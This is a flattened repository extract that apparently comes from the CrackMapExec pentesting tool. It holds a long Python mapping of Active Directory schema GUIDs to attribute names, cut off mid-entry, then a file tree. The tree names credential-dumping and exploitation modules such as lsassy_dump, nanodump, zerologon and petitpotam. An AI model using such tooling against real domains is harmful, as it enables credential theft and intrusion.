"b8dfa744-31dc-4ef1-ac7c-84baf7ef9da7": "ms-PKI-AccountCredentials",
"4d146e4a-48d4-11d1-a9c3-0000f80367c1": "Phone-Ip-Primary",
"e16a9db2-403c-11d1-a9c0-0000f80367c1": "User-SMIME-Certificate",
"862166b6-c941-4727-9565-48bfff2941de": "ms-DS-Is-Member-Of-DL-Transitive",
"1d08694a-ccef-11d2-9993-0000f87a57d4": "MS-SQL-SQLDatabase",
"5b4a06dc-251c-4edb-8813-0bdd71327226": "ms-Authz-Central-Access-Rule",
"963d2741-48be-11d1-a9c3-0000f80367c1": "dhcp-Flags",
"bf9679c7-0de6-11d0-a285-00aa003049e2": "Moniker",
"f39b98ad-938d-11d1-aebd-0000f80367c1": "ms-RRAS-Attribute",
"0296c11f-40da-11d1-a9c0-0000f80367c1": "Phone-ISDN-Primary",
"bf9679d7-0de6-11d0-a285-00aa003049e2": "User-Workstations",
"e215395b-9104-44d9-b894-399ec9e21dfc": "ms-DS-Member-Transitive",
"963d2742-48be-11d1-a9c3-0000f80367c1": "dhcp-Identification",
"bf9679c8-0de6-11d0-a285-00aa003049e2": "Moniker-Display-Name",
"f39b98ac-938d-11d1-aebd-0000f80367c1": "ms-RRAS-Vendor-Attribute-Entry",
"0296c11e-40da-11d1-a9c0-0000f80367c1": "Phone-Mobile-Other",
"bf967a6f-0de6-11d0-a285-00aa003049e2": "USN-Changed",
"b918fe7d-971a-f404-9e21-9261abec970b": "ms-DS-Parent-Dist-Name",
"20af031a-ccef-11d2-9993-0000f87a57d4": "MS-SQL-OLAPDatabase",
"a5679cb0-6f9d-432c-8b75-1e3e834f02aa": "ms-Authz-Central-Access-Policy",
"963d2747-48be-11d1-a9c3-0000f80367c1": "dhcp-Mask",
"1f2ac2c8-3b71-11d2-90cc-00c04fd91ab1": "Move-Tree-State",
"a6f24a23-d65c-4d65-a64f-35fb6873c2b9": "ms-RADIUS-FramedInterfaceId",
"f0f8ffa3-1191-11d0-a060-00aa006c33ed": "Phone-Mobile-Primary",
"bf967a70-0de6-11d0-a285-00aa003049e2": "USN-Created",
"1e02d2ef-44ad-46b2-a67d-9fd18d780bca": "ms-DS-Repl-Value-Meta-Data-Ext",
"963d2754-48be-11d1-a9c3-0000f80367c1": "dhcp-MaxKey",
"998b10f7-aa1a-4364-b867-753d197fe670": "ms-COM-DefaultPartitionLink",
"a4da7289-92a3-42e5-b6b6-dad16d280ac9": "ms-RADIUS-SavedFramedInterfaceId",
"f0f8ffa5-1191-11d0-a060-00aa006c33ed": "Phone-Office-Other",
"bf967a71-0de6-11d0-a285-00aa003049e2": "USN-DSA-Last-Obj-Removed",
"6055f766-202e-49cd-a8be-e52bb159edfb": "ms-DS-Drs-Farm-ID",
"09f0506a-cd28-11d2-9993-0000f87a57d4": "MS-SQL-OLAPCube",
"5ef243a8-2a25-45a6-8b73-08a71ae677ce": "ms-Kds-Prov-ServerConfiguration",
"963d2744-48be-11d1-a9c3-0000f80367c1": "dhcp-Obj-Description",
"430f678b-889f-41f2-9843-203b5a65572f": "ms-COM-ObjectId",
"f63ed610-d67c-494d-87be-cd1e24359a38": "ms-RADIUS-FramedIpv6Prefix",
"f0f8ffa4-1191-11d0-a060-00aa006c33ed": "Phone-Pager-Other",
"a8df7498-c5ea-11d1-bbcb-0080c76670c0": "USN-Intersite",
"b5f1edfe-b4d2-4076-ab0f-6148342b0bf6": "ms-DS-Issuer-Public-Certificates",
"963d2743-48be-11d1-a9c3-0000f80367c1": "dhcp-Obj-Name",
"09abac62-043f-4702-ac2b-6ca15eee5754": "ms-COM-PartitionLink",
"0965a062-b1e1-403b-b48d-5c0eb0e952cc": "ms-RADIUS-SavedFramedIpv6Prefix",
"f0f8ffa6-1191-11d0-a060-00aa006c33ed": "Phone-Pager-Primary",
"bf967a73-0de6-11d0-a285-00aa003049e2": "USN-Last-Obj-Rem",
"60686ace-6c27-43de-a4e5-f00c2f8d3309": "ms-DS-IsManaged",
"ca7b9735-4b2a-4e49-89c3-99025334dc94": "ms-TAPI-Rt-Conference",
"aa02fd41-17e0-4f18-8687-b2239649736b": "ms-Kds-Prov-RootKey",
"963d274f-48be-11d1-a9c3-0000f80367c1": "dhcp-Options",
"67f121dc-7d02-4c7d-82f5-9ad4c950ac34": "ms-COM-PartitionSetLink",
"5a5aa804-3083-4863-94e5-018a79a22ec0": "ms-RADIUS-FramedIpv6Route",
"9c979768-ba1a-4c08-9632-c6a5c1ed649a": "photo",
"167758ad-47f3-11d1-a9c3-0000f80367c1": "USN-Source",
"5315ba8e-958f-4b52-bd38-1349a304dd63": "ms-DS-Cloud-IsManaged",
"963d2753-48be-11d1-a9c3-0000f80367c1": "dhcp-Properties",
"9e6f3a4d-242c-4f37-b068-36b57f9fc852": "ms-COM-UserLink",
"9666bb5c-df9d-4d41-b437-2eec7e27c9b3": "ms-RADIUS-SavedFramedIpv6Route",
"bf9679f7-0de6-11d0-a285-00aa003049e2": "Physical-Delivery-Office-Name",
"4d2fa380-7f54-11d2-992a-0000f87a57d4": "Valid-Accesses",
"78565e80-03d4-4fe3-afac-8c3bca2f3653": "ms-DS-Cloud-Anchor",
"53ea1cb5-b704-4df9-818f-5cb4ec86cac1": "ms-TAPI-Rt-Person",
"7b8b558a-93a5-4af7-adca-c017e67f1057": "ms-DS-Group-Managed-Service-Account",
"963d2748-48be-11d1-a9c3-0000f80367c1": "dhcp-Ranges",
"8e940c8a-e477-4367-b08d-ff2ff942dcd7": "ms-COM-UserPartitionSetLink",
"3532dfd8-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Name",
"b7b13119-b82e-11d0-afee-0000f80367c1": "Physical-Location-Object",
"281416df-1968-11d0-a28f-00aa003049e2": "Vendor",
"a1e8b54f-4bd6-4fd2-98e2-bcee92a55497": "ms-DS-Cloud-Issuer-Public-Certificates",
"963d274a-48be-11d1-a9c3-0000f80367c1": "dhcp-Reservations",
"e85e1204-3434-41ad-9b56-e2901228fff0": "MS-DRM-Identity-Certificate",
"48fd44ea-ccee-11d2-9993-0000f87a57d4": "MS-SQL-RegisteredOwner",
"8d3bca50-1d7e-11d0-a081-00aa006c33ed": "Picture",
"bf967a76-0de6-11d0-a285-00aa003049e2": "Version-Number",
"89848328-7c4e-4f6f-a013-28ce3ad282dc": "ms-DS-Cloud-IsEnabled",
"50ca5d7d-5c8b-4ef3-b9df-5b66d491e526": "ms-WMI-IntRangeParam",
"e3c27fdf-b01d-4f4e-87e7-056eef0eb922": "ms-DS-Value-Type",
"963d2745-48be-11d1-a9c3-0000f80367c1": "dhcp-Servers",
"80863791-dbe9-4eb8-837e-7f0ab55d9ac7": "ms-DS-Additional-Dns-Host-Name",
"4f6cbdd8-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Contact",
"fc5a9106-3b9d-11d2-90cc-00c04fd91ab1": "PKI-Critical-Extensions",
"7d6c0e9a-7e20-11d0-afd6-00c04fd930c9": "Version-Number-Hi",
"b7acc3d2-2a74-4fa4-ac25-e63fe8b61218": "ms-DS-SyncServerUrl",
"963d2749-48be-11d1-a9c3-0000f80367c1": "dhcp-Sites",
"975571df-a4d5-429a-9f59-cdc6581d91e6": "ms-DS-Additional-Sam-Account-Name",
"561c9644-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Location",
"1ef6336e-3b9e-11d2-90cc-00c04fd91ab1": "PKI-Default-CSPs",
"7d6c0e9b-7e20-11d0-afd6-00c04fd930c9": "Version-Number-Lo",
"de0caa7f-724e-4286-b179-192671efc664": "ms-DS-User-Allowed-To-Authenticate-To",
"292f0d9a-cf76-42b0-841f-b650f331df62": "ms-WMI-IntSetParam",
"2eeb62b3-1373-fe45-8101-387f1676edc7": "ms-DS-Claims-Transformation-Policy-Type",
"963d2752-48be-11d1-a9c3-0000f80367c1": "dhcp-State",
"d3aa4a5c-4e03-4810-97aa-2b339e7a434b": "MS-DS-All-Users-Trust-Quota",
"5b5d448c-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Memory",
"426cae6e-3b9d-11d2-90cc-00c04fd91ab1": "PKI-Default-Key-Spec",
"1f0075fd-7e40-11d0-afd6-00c04fd930c9": "Vol-Table-GUID",
"2c4c9600-b0e1-447d-8dda-74902257bdb5": "ms-DS-User-Allowed-To-Authenticate-From",
"963d2746-48be-11d1-a9c3-0000f80367c1": "dhcp-Subnets",
"8469441b-9ac4-4e45-8205-bd219dbf672d": "ms-DS-Allowed-DNS-Suffixes",
"603e94c4-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Build",
"926be278-56f9-11d2-90d0-00c04fd91ab1": "PKI-Enrollment-Access",
"1f0075fb-7e40-11d0-afd6-00c04fd930c9": "Vol-Table-Idx-GUID",
"8521c983-f599-420f-b9ab-b1222bdf95c1": "ms-DS-User-TGT-Lifetime",
"07502414-fdca-4851-b04a-13645b11d226": "ms-WMI-MergeablePolicyTemplate",
"c8fca9b1-7d88-bb4f-827a-448927710762": "ms-DS-Claims-Transformation-Policies",
"963d273b-48be-11d1-a9c3-0000f80367c1": "dhcp-Type",
"800d94d7-b7a1-42a1-b14d-7cae1423d07f": "ms-DS-Allowed-To-Delegate-To",
"64933a3e-ccee-11d2-9993-0000f87a57d4": "MS-SQL-ServiceAccount",
"041570d2-3b9e-11d2-90cc-00c04fd91ab1": "PKI-Expiration-Period",
"34aaa217-b699-11d0-afee-0000f80367c1": "Volume-Count",
"105babe9-077e-4793-b974-ef0410b62573": "ms-DS-Computer-Allowed-To-Authenticate-To",
"963d273a-48be-11d1-a9c3-0000f80367c1": "dhcp-Unique-Key",
"c4af1073-ee50-4be0-b8c0-89a41fe99abe": "ms-DS-Auxiliary-Classes",
"696177a6-ccee-11d2-9993-0000f87a57d4": "MS-SQL-CharacterSet",
"18976af6-3b9e-11d2-90cc-00c04fd91ab1": "PKI-Extended-Key-Usage",
"244b2970-5abd-11d0-afd2-00c04fd930c9": "Wbem-Path",
"2e937524-dfb9-4cac-a436-a5b7da64fd66": "ms-DS-Computer-TGT-Lifetime",
"55dd81c9-c312-41f9-a84d-c6adbdf1e8e1": "ms-WMI-ObjectEncoding",
"641e87a4-8326-4771-ba2d-c706df35e35a": "ms-DS-Cloud-Extensions",
"963d2755-48be-11d1-a9c3-0000f80367c1": "dhcp-Update-Time",
"e185d243-f6ce-4adb-b496-b0c005d7823c": "ms-DS-Approx-Immed-Subordinates",
"6ddc42c0-ccee-11d2-9993-0000f87a57d4": "MS-SQL-SortOrder",
"e9b0a87e-3b9d-11d2-90cc-00c04fd91ab1": "PKI-Key-Usage",
"05308983-7688-11d1-aded-00c04fd8d5cd": "Well-Known-Objects",
"f2973131-9b4d-4820-b4de-0474ef3b849f": "ms-DS-Service-Allowed-To-Authenticate-To",
"bf967953-0de6-11d0-a285-00aa003049e2": "Display-Name",
"3e1ee99c-6604-4489-89d9-84798a89515a": "ms-DS-AuthenticatedAt-DC",
"72dc918a-ccee-11d2-9993-0000f87a57d4": "MS-SQL-UnicodeSortOrder",
"f0bfdefa-3b9d-11d2-90cc-00c04fd91ab1": "PKI-Max-Issuing-Depth",
"bf967a77-0de6-11d0-a285-00aa003049e2": "When-Changed",
"97da709a-3716-4966-b1d1-838ba53c3d89": "ms-DS-Service-Allowed-To-Authenticate-From",
"e2bc80f1-244a-4d59-acc6-ca5c4f82e6e1": "ms-WMI-PolicyTemplate",
"310b55ce-3dcd-4392-a96d-c9e35397c24f": "ms-DS-Device-Registration-Service-Container",
"bf967954-0de6-11d0-a285-00aa003049e2": "Display-Name-Printable",
"e8b2c971-a6df-47bc-8d6f-62770d527aa5": "ms-DS-AuthenticatedTo-Accountlist",
"7778bd90-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Clustered",
"1219a3ec-3b9e-11d2-90cc-00c04fd91ab1": "PKI-Overlap-Period",
"bf967a78-0de6-11d0-a285-00aa003049e2": "When-Created",
"5dfe3c20-ca29-407d-9bab-8421e55eb75c": "ms-DS-Service-TGT-Lifetime",
"9a7ad946-ca53-11d1-bbd0-0080c76670c0": "DIT-Content-Rules",
"503fc3e8-1cc6-461a-99a3-9eee04f402a7": "ms-DS-Az-Application-Data",
"7b91c840-ccee-11d2-9993-0000f87a57d4": "MS-SQL-NamedPipe",
"8447f9f1-1027-11d0-a05f-00aa006c33ed": "PKT",
"bf967a79-0de6-11d0-a285-00aa003049e2": "Winsock-Addresses",
"b23fc141-0df5-4aea-b33d-6cf493077b3f": "ms-DS-Assigned-AuthN-Policy-Silo",
"595b2613-4109-4e77-9013-a3bb4ef277c7": "ms-WMI-PolicyType",
"96bc3a1a-e3d2-49d3-af11-7b0df79d67f5": "ms-DS-Device-Registration-Service",
"fe6136a0-2073-11d0-a9c2-00aa006c33ed": "Division",
"db5b0728-6208-4876-83b7-95d3e5695275": "ms-DS-Az-Application-Name",
"8157fa38-ccee-11d2-9993-0000f87a57d4": "MS-SQL-MultiProtocol",
"8447f9f0-1027-11d0-a05f-00aa006c33ed": "PKT-Guid",
"bf967a7a-0de6-11d0-a285-00aa003049e2": "WWW-Home-Page",
"33140514-f57a-47d2-8ec4-04c4666600c7": "ms-DS-Assigned-AuthN-Policy-Silo-BL",
"f0f8ff8b-1191-11d0-a060-00aa006c33ed": "DMD-Location",
"7184a120-3ac4-47ae-848f-fe0ab20784d4": "ms-DS-Az-Application-Version",
"86b08004-ccee-11d2-9993-0000f87a57d4": "MS-SQL-SPX",
"19405b96-3cfa-11d1-a9c0-0000f80367c1": "Policy-Replication-Flags",
"9a9a0221-4a5b-11d1-a9c3-0000f80367c1": "WWW-Page-Other",
"164d1e05-48a6-4886-a8e9-77a2006e3c77": "ms-DS-AuthN-Policy-Silo-Members",
"45fb5a57-5018-4d0f-9056-997c8c9122d9": "ms-WMI-RangeParam",
"7c9e8c58-901b-4ea8-b6ec-4eb9e9fc0e11": "ms-DS-Device-Container",
"167757b9-47f3-11d1-a9c3-0000f80367c1": "DMD-Name",
"33d41ea8-c0c9-4c92-9494-f104878413fd": "ms-DS-Az-Biz-Rule",
"8ac263a6-ccee-11d2-9993-0000f87a57d4": "MS-SQL-TCPIP",
"281416c4-1968-11d0-a28f-00aa003049e2": "Port-Name",
"bf967a7b-0de6-11d0-a285-00aa003049e2": "X121-Address",
"11fccbc7-fbe4-4951-b4b7-addf6f9efd44": "ms-DS-AuthN-Policy-Silo-Members-BL",
"2df90d86-009f-11d2-aa4c-00c04fd7d83a": "DN-Reference-Update",
"52994b56-0e6c-4e07-aa5c-ef9d7f5a0e25": "ms-DS-Az-Biz-Rule-Language",
"8fda89f4-ccee-11d2-9993-0000f87a57d4": "MS-SQL-AppleTalk",
"bf9679fa-0de6-11d0-a285-00aa003049e2": "Poss-Superiors",
"d07da11f-8a3d-42b6-b0aa-76c962be719a": "x500uniqueIdentifier",
"cd26b9f3-d415-442a-8f78-7c61523ee95b": "ms-DS-User-AuthN-Policy",
"6afe8fe2-70bc-4cce-b166-a96f7359c514": "ms-WMI-RealRangeParam",
"d2b1470a-8f84-491e-a752-b401ee00fe5c": "ms-DS-AuthN-Policy-Silos",
"e0fa1e65-9b45-11d0-afdd-00c04fd930c9": "Dns-Allow-Dynamic",
"013a7277-5c2d-49ef-a7de-b765b36a3f6f": "ms-DS-Az-Class-ID",
"94c56394-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Vines",
"9a7ad94c-ca53-11d1-bbd0-0080c76670c0": "Possible-Inferiors",
"bf967a7f-0de6-11d0-a285-00aa003049e2": "X509-Cert",
"2f17faa9-5d47-4b1f-977e-aa52fabe65c8": "ms-DS-User-AuthN-Policy-BL",
"e0fa1e66-9b45-11d0-afdd-00c04fd930c9": "Dns-Allow-XFR",
"6448f56a-ca70-4e2e-b0af-d20e4ce653d0": "ms-DS-Az-Domain-Timeout",
"9a7d4770-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Status",
"bf9679fb-0de6-11d0-a285-00aa003049e2": "Post-Office-Box",
"612cb747-c0e8-4f92-9221-fdd5f15b550d": "UnixUserPassword",
"afb863c9-bea3-440f-a9f3-6153cc668929": "ms-DS-Computer-AuthN-Policy",
"3c7e6f83-dd0e-481b-a0c2-74cd96ef2a66": "ms-WMI-Rule",
"3a9adf5d-7b97-4f7e-abb4-e5b55c1c06b4": "ms-DS-AuthN-Policies",
"72e39547-7b18-11d1-adef-00c04fd8d5cd": "DNS-Host-Name",
"f90abab0-186c-4418-bb85-88447c87222a": "ms-DS-Az-Generate-Audits",
"9fcc43d4-ccee-11d2-9993-0000f87a57d4": "MS-SQL-LastUpdatedDate",
"bf9679fc-0de6-11d0-a285-00aa003049e2": "Postal-Address",
"850fcc8f-9c6b-47e1-b671-7c654be4d5b3": "UidNumber",
"2bef6232-30a1-457e-8604-7af6dbf131b8": "ms-DS-Computer-AuthN-Policy-BL",
"e0fa1e68-9b45-11d0-afdd-00c04fd930c9": "Dns-Notify-Secondaries",
"665acb5c-bb92-4dbc-8c59-b3638eab09b3": "ms-DS-Az-Last-Imported-Biz-Rule-Path",
"a42cd510-ccee-11d2-9993-0000f87a57d4": "MS-SQL-InformationURL",
"bf9679fd-0de6-11d0-a285-00aa003049e2": "Postal-Code",
"c5b95f0c-ec9e-41c4-849c-b46597ed6696": "GidNumber",
"2a6a6d95-28ce-49ee-bb24-6d1fc01e3111": "ms-DS-Service-AuthN-Policy",
"f1e44bdf-8dd3-4235-9c86-f91f31f5b569": "ms-WMI-ShadowObject",
"f9f0461e-697d-4689-9299-37e61d617b0d": "ms-DS-AuthN-Policy-Silo",
"675a15fe-3b70-11d2-90cc-00c04fd91ab1": "DNS-Property",
"5e53368b-fc94-45c8-9d7d-daf31ee7112d": "ms-DS-Az-LDAP-Query",
"a92d23da-ccee-11d2-9993-0000f87a57d4": "MS-SQL-ConnectionURL",
"bf9679fe-0de6-11d0-a285-00aa003049e2": "Preferred-Delivery-Method",
"a3e03f1f-1d55-4253-a0af-30c2a784e46e": "Gecos",
"2c1128ec-5aa2-42a3-b32d-f0979ca9fcd2": "ms-DS-Service-AuthN-Policy-BL",
"f60a8f96-57c4-422c-a3ad-9e2fa09ce6f7": "ms-DS-Device-MDMStatus",
"e0fa1e69-9b45-11d0-afdd-00c04fd930c9": "Dns-Record",
"cfb9adb7-c4b7-4059-9568-1ed9db6b7248": "ms-DS-Az-Major-Version",
"ae0c11b8-ccee-11d2-9993-0000f87a57d4": "MS-SQL-PublicationURL",
"856be0d0-18e7-46e1-8f5f-7ee4d9020e0d": "preferredLanguage",
"bc2dba12-000f-464d-bf1d-0808465d8843": "UnixHomeDirectory",
"b87a0ad8-54f7-49c1-84a0-e64d12853588": "ms-DS-Assigned-AuthN-Policy",
"6cc8b2b5-12df-44f6-8307-e74f5cdee369": "ms-WMI-SimplePolicyTemplate",
"a11703b7-5641-4d9c-863e-5fb3325e74e0": "ms-DS-GeoCoordinates-Altitude",
"bf967959-0de6-11d0-a285-00aa003049e2": "Dns-Root",
"ee85ed93-b209-4788-8165-e702f51bfbf3": "ms-DS-Az-Minor-Version",
"b222ba0e-ccee-11d2-9993-0000f87a57d4": "MS-SQL-GPSLatitude",
"bf9679ff-0de6-11d0-a285-00aa003049e2": "Preferred-OU",
"a553d12c-3231-4c5e-8adf-8d189697721e": "LoginShell",
"2d131b3c-d39f-4aee-815e-8db4bc1ce7ac": "ms-DS-Assigned-AuthN-Policy-BL",
"dc66d44e-3d43-40f5-85c5-3c12e169927e": "ms-DS-GeoCoordinates-Latitude",
"e0fa1e67-9b45-11d0-afdd-00c04fd930c9": "Dns-Secure-Secondaries",
"a5f3b553-5d76-4cbe-ba3f-4312152cab18": "ms-DS-Az-Operation-ID",
"b7577c94-ccee-11d2-9993-0000f87a57d4": "MS-SQL-GPSLongitude",
"52458022-ca6a-11d0-afff-0000f80367c1": "Prefix-Map",
"f8f2689c-29e8-4843-8177-e8b98e15eeac": "ShadowLastChange",
"7a560cc2-ec45-44ba-b2d7-21236ad59fd5": "ms-DS-AuthN-Policy-Enforced",
"ab857078-0142-4406-945b-34c9b6b13372": "ms-WMI-Som",
"94c42110-bae4-4cea-8577-af813af5da25": "ms-DS-GeoCoordinates-Longitude",
"d5eb2eb7-be4e-463b-a214-634a44d7392e": "DNS-Tombstoned",
"515a6b06-2617-4173-8099-d5605df043c6": "ms-DS-Az-Scope-Name",
"bcdd4f0e-ccee-11d2-9993-0000f87a57d4": "MS-SQL-GPSHeight",
"a8df744b-c5ea-11d1-bbcb-0080c76670c0": "Presentation-Address",
"a76b8737-e5a1-4568-b057-dc12e04be4b2": "ShadowMin",
"f2f51102-6be0-493d-8726-1546cdbc8771": "ms-DS-AuthN-Policy-Silo-Enforced",
"bd29bf90-66ad-40e1-887b-10df070419a6": "ms-DS-External-Directory-Object-Id",
"f18a8e19-af5f-4478-b096-6f35c27eb83f": "documentAuthor",
"2629f66a-1f95-4bf3-a296-8e9d7b9e30c8": "ms-DS-Az-Script-Engine-Cache-Max",
"c07cc1d0-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Version",
"963d2739-48be-11d1-a9c3-0000f80367c1": "Previous-CA-Certificates",
"f285c952-50dd-449e-9160-3b880d99988d": "ShadowMax",
"0bc579a2-1da7-4cea-b699-807f3b9d63a4": "ms-WMI-StringSetParam",
"0b21ce82-ff63-46d9-90fb-c8b9f24e97b9": "documentIdentifier",
"87d0fb41-2c8b-41f6-b972-11fdfd50d6b0": "ms-DS-Az-Script-Timeout",
"c57f72f4-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Language",
"963d273d-48be-11d1-a9c3-0000f80367c1": "Previous-Parent-CA",
"7ae89c9c-2976-4a46-bb8a-340f88560117": "ShadowWarning",
"2628a46a-a6ad-4ae0-b854-2b12d9fe6f9e": "account",
"bf967aa1-0de6-11d0-a285-00aa003049e2": "Mail-Recipient",
"b958b14e-ac6d-4ec4-8892-be70b69f7281": "documentLocation",
"7b078544-6c82-4fe9-872f-ff48ad2b2e26": "ms-DS-Az-Task-Is-Role-Definition",
"8386603c-ccef-11d2-9993-0000f87a57d4": "MS-SQL-Description",
"bf967a00-0de6-11d0-a285-00aa003049e2": "Primary-Group-ID",
"86871d1f-3310-4312-8efd-af49dcfb2671": "ShadowInactive",
"bf967a83-0de6-11d0-a285-00aa003049e2": "Class-Schema",
"d9a799b2-cef3-48b3-b5ad-fb85f8dd3214": "ms-WMI-UintRangeParam",
"59527d0f-b7c0-4ce2-a1dd-71cef6963292": "ms-DS-Is-Compliant",
"170f09d7-eb69-448a-9a30-f1afecfd32d7": "documentPublisher",
"8491e548-6c38-4365-a732-af041569b02c": "ms-DS-Az-Object-Guid",
"ca48eba8-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Type",
"c0ed8738-7efd-4481-84d9-66d2db8be369": "Primary-Group-Token",
"75159a00-1fff-4cf4-8bff-4ef2695cf643": "ShadowExpire",
"d1328fbc-8574-4150-881d-0b1088827878": "ms-DS-Key-Principal-BL",
"de265a9c-ff2c-47b9-91dc-6e6fe2c43062": "documentTitle",
"b5f7e349-7a5b-407c-a334-a31c3f538b98": "ms-DS-Az-Generic-Data",
"d0aedb2e-ccee-11d2-9993-0000f87a57d4": "MS-SQL-InformationDirectory",
"281416d7-1968-11d0-a28f-00aa003049e2": "Print-Attributes",
"8dfeb70d-c5db-46b6-b15e-a4389e6cee9b": "ShadowFlag",
"7f561288-5301-11d1-a9c5-0000f80367c1": "ACS-Policy",
"8f4beb31-4e19-46f5-932e-5fa03c339b1d": "ms-WMI-UintSetParam",
"c4a46807-6adc-4bbb-97de-6bed181a1bfe": "ms-DS-Device-Trust-Type",
"94b3a8a9-d613-4cec-9aad-5fbcc1046b43": "documentVersion",
"d31a8757-2447-4545-8081-3bb610cacbf2": "ms-DS-Behavior-Version",
"d5a0dbdc-ccee-11d2-9993-0000f87a57d4": "MS-SQL-Database",
"281416cd-1968-11d0-a28f-00aa003049e2": "Print-Bin-Names",
"03dab236-672e-4f61-ab64-f77d2dc2ffab": "MemberUid",
"1dcc0722-aab0-4fef-956f-276fe19de107": "ms-DS-Shadow-Principal-Sid",
"7bfdcb7a-4807-11d1-a9c3-0000f80367c1": "Domain-Certificate-Authorities",
"f0d8972e-dd5b-40e5-a51d-044c7c17ece7": "ms-DS-Byte-Array",
"db77be4a-ccee-11d2-9993-0000f87a57d4": "MS-SQL-AllowAnonymousSubscription",
"281416d2-
gitextract_1_y4acn_/
├── .dockerignore
├── .github/
│ ├── ISSUE_TEMPLATE/
│ │ └── bug_report.md
│ └── workflows/
│ ├── crackmapexec-test.yml
│ └── crackmapexec.yml
├── .gitignore
├── .gitmodules
├── Dockerfile
├── LICENSE
├── Makefile
├── README.md
├── build_collector.py
├── cme/
│ ├── .hooks/
│ │ └── hook-lsassy.py
│ ├── __init__.py
│ ├── cli.py
│ ├── cmedb.py
│ ├── config.py
│ ├── connection.py
│ ├── console.py
│ ├── context.py
│ ├── crackmapexec.py
│ ├── data/
│ │ ├── cme.conf
│ │ ├── default.pem
│ │ ├── keepass_trigger_module/
│ │ │ ├── AddKeePassTrigger.ps1
│ │ │ ├── RemoveKeePassTrigger.ps1
│ │ │ └── RestartKeePass.ps1
│ │ ├── msol_dump/
│ │ │ └── msol_dump.ps1
│ │ ├── veeam_dump_module/
│ │ │ ├── veeam_dump_mssql.ps1
│ │ │ └── veeam_dump_postgresql.ps1
│ │ └── wmiexec_event_vbscripts/
│ │ ├── Exec_Command_Silent.vbs
│ │ └── Exec_Command_WithOutput.vbs
│ ├── first_run.py
│ ├── helpers/
│ │ ├── __init__.py
│ │ ├── bash.py
│ │ ├── bloodhound.py
│ │ ├── http.py
│ │ ├── logger.py
│ │ ├── misc.py
│ │ ├── msada_guids.py
│ │ └── powershell.py
│ ├── loaders/
│ │ ├── __init__.py
│ │ ├── moduleloader.py
│ │ └── protocolloader.py
│ ├── logger.py
│ ├── modules/
│ │ ├── IOXIDResolver.py
│ │ ├── MachineAccountQuota.py
│ │ ├── adcs.py
│ │ ├── add_computer.py
│ │ ├── appcmd.py
│ │ ├── bh_owned.py
│ │ ├── daclread.py
│ │ ├── dfscoerce.py
│ │ ├── drop-sc.py
│ │ ├── empire_exec.py
│ │ ├── enum_av.py
│ │ ├── enum_dns.py
│ │ ├── example_module.py
│ │ ├── find-computer.py
│ │ ├── firefox.py
│ │ ├── get-desc-users.py
│ │ ├── get_netconnections.py
│ │ ├── gpp_autologin.py
│ │ ├── gpp_password.py
│ │ ├── group_members.py
│ │ ├── groupmembership.py
│ │ ├── handlekatz.py
│ │ ├── hash_spider.py
│ │ ├── impersonate.py
│ │ ├── install_elevated.py
│ │ ├── keepass_discover.py
│ │ ├── keepass_trigger.py
│ │ ├── laps.py
│ │ ├── ldap-checker.py
│ │ ├── lsassy_dump.py
│ │ ├── masky.py
│ │ ├── met_inject.py
│ │ ├── ms17-010.py
│ │ ├── msol.py
│ │ ├── mssql_priv.py
│ │ ├── nanodump.py
│ │ ├── nopac.py
│ │ ├── ntdsutil.py
│ │ ├── ntlmv1.py
│ │ ├── petitpotam.py
│ │ ├── pi.py
│ │ ├── printnightmare.py
│ │ ├── procdump.py
│ │ ├── pso.py
│ │ ├── rdcman.py
│ │ ├── rdp.py
│ │ ├── reg-query.py
│ │ ├── runasppl.py
│ │ ├── scan-network.py
│ │ ├── scuffy.py
│ │ ├── shadowcoerce.py
│ │ ├── slinky.py
│ │ ├── spider_plus.py
│ │ ├── spooler.py
│ │ ├── subnets.py
│ │ ├── teams_localdb.py
│ │ ├── test_connection.py
│ │ ├── trust.py
│ │ ├── uac.py
│ │ ├── user_desc.py
│ │ ├── veeam_dump.py
│ │ ├── wcc.py
│ │ ├── wdigest.py
│ │ ├── web_delivery.py
│ │ ├── webdav.py
│ │ ├── whoami.py
│ │ ├── winscp_dump.py
│ │ ├── wireless.py
│ │ └── zerologon.py
│ ├── parsers/
│ │ ├── __init__.py
│ │ ├── ip.py
│ │ ├── nessus.py
│ │ └── nmap.py
│ ├── paths.py
│ ├── protocols/
│ │ ├── __init__.py
│ │ ├── ftp/
│ │ │ ├── __init__.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ └── proto_args.py
│ │ ├── ftp.py
│ │ ├── ldap/
│ │ │ ├── __init__.py
│ │ │ ├── bloodhound.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ ├── gmsa.py
│ │ │ ├── kerberos.py
│ │ │ ├── laps.py
│ │ │ └── proto_args.py
│ │ ├── ldap.py
│ │ ├── mssql/
│ │ │ ├── __init__.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ ├── mssqlexec.py
│ │ │ └── proto_args.py
│ │ ├── mssql.py
│ │ ├── rdp/
│ │ │ ├── __init__.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ └── proto_args.py
│ │ ├── rdp.py
│ │ ├── smb/
│ │ │ ├── __init__.py
│ │ │ ├── atexec.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ ├── firefox.py
│ │ │ ├── mmcexec.py
│ │ │ ├── passpol.py
│ │ │ ├── proto_args.py
│ │ │ ├── remotefile.py
│ │ │ ├── samrfunc.py
│ │ │ ├── samruser.py
│ │ │ ├── smbexec.py
│ │ │ ├── smbspider.py
│ │ │ └── wmiexec.py
│ │ ├── smb.py
│ │ ├── ssh/
│ │ │ ├── __init__.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ └── proto_args.py
│ │ ├── ssh.py
│ │ ├── vnc/
│ │ │ ├── __init__.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
│ │ │ └── proto_args.py
│ │ ├── vnc.py
│ │ ├── winrm/
│ │ │ ├── __init__.py
│ │ │ ├── database.py
│ │ │ ├── db_navigator.py
